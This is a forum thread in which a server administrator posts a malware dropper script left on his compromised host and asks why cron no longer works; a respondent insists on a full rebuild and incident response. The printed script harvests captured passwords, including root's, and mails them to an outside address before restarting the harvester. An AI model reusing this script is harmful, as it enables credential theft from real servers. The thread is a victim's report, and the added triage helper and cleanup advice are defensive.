LinuxQuestions.org

Linux - Newbie: SSH Hack - IptabLes & IptabLex (https://www.linuxquestions.org/questions/linux-newbie-8/ssh-hack-iptables-and-iptablex-4175507269/)

T-Dub116 06-06-2014 03:07 PM

SSH Hack - IptabLes & IptabLex
 
My server was recently attacked with a bot; here is a file left behind.

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log > test #This part, the output to test, they were able to uncover all users passwords including "roots"
mkdir /usr/share/misc/
mkdir /usr/share/misc/blah/
cat /usr/share/misc/blah/temp.log |uniq >> test
echo >/usr/share/misc/blah/temp.log
mail deathface2007@yahoo.com -s "$(hostname -f)" < test #Left his email address behind
rm -rf test httpd.log
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A


I was able to lock down ssh in /etc/ssh/sshd_config, and remove and kill off the processes and files from the hacker.

But cron is not working now:

# service crond restart
Stopping crond: [FAILED]
Starting crond: execvp: No such file or directory
[FAILED]

I tried re-loading rpm's but it still will not run. The hacker seems to have done something to kill cron.

Any ideas of what I can do?

Also, is there a way to remove cron all together so I can reload it altogether?
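The dropper above names its own artifacts (/usr/lib/popauth, its httpd.log capture file, the /usr/share/misc/blah/ staging directory), and "execvp: No such file or directory" from the init script means the crond binary it tries to execute is no longer there. The following triage helper is an added example, not code from the thread: it checks a filesystem tree for exactly those indicators; the crond path /usr/sbin/crond is an assumption for an rpm-based system, and the sample tree it builds is constructed for demonstration.

```python
#!/usr/bin/env python3
"""Added triage helper (not from the thread): look for the artifacts named in
the dropper script and for the missing crond binary the execvp error implies."""
import os
import tempfile

# Artifacts taken directly from the dropper script in the first post.
DROPPER_ARTIFACTS = [
    "usr/lib/popauth",               # the credential harvester it restarts
    "usr/lib/httpd.log",             # its capture file, which it mails out
    "usr/share/misc/blah",           # staging directory it creates
    "usr/share/misc/blah/temp.log",
]
# Assumed location of the cron daemon on an rpm-based system (not stated in the
# thread); "execvp: No such file or directory" means the init script could not
# find the binary to execute.
CROND_BINARY = "usr/sbin/crond"


def triage(root="/"):
    """Return findings for the tree rooted at `root` (use "/" on a live host)."""
    findings = {"present_artifacts": [], "crond_missing": False}
    for rel in DROPPER_ARTIFACTS:
        if os.path.lexists(os.path.join(root, rel)):
            findings["present_artifacts"].append("/" + rel)
    findings["crond_missing"] = not os.path.isfile(os.path.join(root, CROND_BINARY))
    return findings


def is_suspect(findings):
    """Any dropper artifact, or a missing crond, warrants treating the host as compromised."""
    return bool(findings["present_artifacts"]) or findings["crond_missing"]


def build_sample_tree(crond_present=False, infected=True):
    """Constructed mock tree mimicking the poster's host (demonstration only)."""
    root = tempfile.mkdtemp()
    for d in ("usr/lib", "usr/share/misc", "usr/sbin"):
        os.makedirs(os.path.join(root, d))
    if crond_present:
        open(os.path.join(root, CROND_BINARY), "w").close()
    if infected:
        os.makedirs(os.path.join(root, "usr/share/misc/blah"))
        open(os.path.join(root, "usr/lib/popauth"), "w").close()
        open(os.path.join(root, "usr/share/misc/blah/temp.log"), "w").close()
    return root


if __name__ == "__main__":
    print(triage(build_sample_tree()))
```

On a live rpm-based host, pair this with `rpm -Vf /usr/sbin/crond` to confirm whether the package's files were altered or removed rather than just re-installing the rpm.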

unSpawn 06-06-2014 03:55 PM

Quote:

Originally Posted by T-Dub116 (Post 5183722)
Any ideas of what I can do?

Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?

T-Dub116 06-09-2014 07:00 AM

Quote:

Originally Posted by unSpawn (Post 5183749)
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?



My customer runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install".

---------- Post added 06-09-14 at 08:01 AM ----------

Quote:

Originally Posted by unSpawn (Post 5183749)
Cut your losses, learn a lesson and install cleanly taking the appropriate precautions.

Do you know what to do or would you like to know more?

Do you have any ideas for me on getting Cron working?

unSpawn 06-09-2014 08:52 AM

Quote:

Originally Posted by T-Dub116 (Post 5185049)
My customer runs his entire business on this server, so I am unable to just "Cut my losses and do a clean install".

First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords or private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.

T-Dub116 06-10-2014 09:40 AM

Quote:

Originally Posted by unSpawn (Post 5185100)
First of all it took you days to reply. Then you're talking only about combating symptoms in your OP but not the cause. That unfortunately is a good indication of somebody, and I don't know what's the reason, trying to "fix" things (which is supported by your actions like locking down after the fact and re-installing packages). (If you want to see where this is coming from I invite you to search the LQ Linux - Security forum for forensics / incident response clues.)

So. Let me phrase this differently then:

- Installing this malware required root privileges: that means it isn't some isolated breach of security but a root compromise.
- You may not have a clue when the cracker gained root rights, what s/he installed or siphoned off of the machine (passwords, private keys, any data).
- If you value your business you wouldn't cheat your customer into thinking all is well. It isn't. So deal with it.

So. What to do? Inform your users and client(s). Set up a new machine. Don't recycle system data, passwords or private keys. Harden it properly. Adhere to best practices.
Pull any data (to an intermediate system), separate user data and verify everything before migrating it. Don't allow customers to inject stale software or software of questionable origin including plug-ins, add-ons, themes and whatnot. Ensure auditing is enabled. Remain vigilant always. Respond to alerts in a timely fashion.



Thanks for trying to help, but I found another online forum that is helping to solve my problem.

JeremyBoden 06-10-2014 03:16 PM

I doubt it.

unSpawn 06-11-2014 09:07 PM

Quote:

Originally Posted by T-Dub116 (Post 5185679)
(..) I found another online forum that is helping to solve my problem.

I'm sure you have.


For anyone else: should you want to check then, due to http://rkhunter.cvs.sourceforge.net/....507&r2=1.508& and http://rkhunter.cvs.sourceforge.net/....1&view=markup, you'd best get Rootkit Hunter from CVS until it is released officially.
